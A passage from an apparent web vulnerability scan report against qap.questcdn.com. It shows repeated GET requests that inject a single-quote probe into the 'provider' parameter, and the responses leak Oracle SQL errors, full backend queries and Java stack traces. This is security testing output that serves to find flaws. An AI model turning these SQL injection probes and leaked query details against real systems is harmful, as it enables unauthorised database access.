oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | 11 |
| provider | GET | %27 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=%2527 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:24 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:24 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4050
Content-Type: text/html;charset=utf-8
<font color="#FF0000">2011/03/01 14:04:24.479 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:04:24 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:24 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4050
Content-Type: text/html;charset=utf-8
<font color="#FF0000">2011/03/01 14:04:24.479 [ 1] (TP-Processor1844) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html |
Parameters
| Parameter | Type | Value |
| group | GET | 11 |
| provider | GET | %27 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=%2527&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4205
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:04:47.136 [ 1] (TP-Processor1804) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:04:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4205
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:04:47.136 [ 1] (TP-Processor1804) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
|
- /qap/projects/prj_browse/ipp_prj_browse.html
/qap/projects/prj_browse/ipp_prj_browse.html |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | 11 |
| provider | GET | %27 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse.html?jobCategoryNo=324403&group=11&provider=%2527 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:04:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4179
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:05:01.191 [ 1] (TP-Processor1569) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font>
Date: Tue, 01 Mar 2011 20:04:47 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:04:47 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 4179
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><font color="#FF0000">2011/03/01 14:05:01.191 [ 1] (TP-Processor1569) Problem including template component SQLLOOP query=" SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = <?p:provider.toSQLString()?> AND ws.application_context = '<?a:appContext?>' " name="sq"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01722: invalid number while executing: SELECT ws.css_url, ws.html_header1, ws.html_footer, ws.html_leftside, ws.html_rightside, p.company_name, ws.html_header2, ws.html_header3 FROM IPP_Web_Styles ws, provider_web_styles pws, provider_accounts p WHERE ws.style_id = pws.style_id AND pws.provider_no = p.provider_no AND p.provider_no = '%27' AND ws.application_context = '/qap' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.fetch(TTC7Protocol.java:1198) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2400) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at 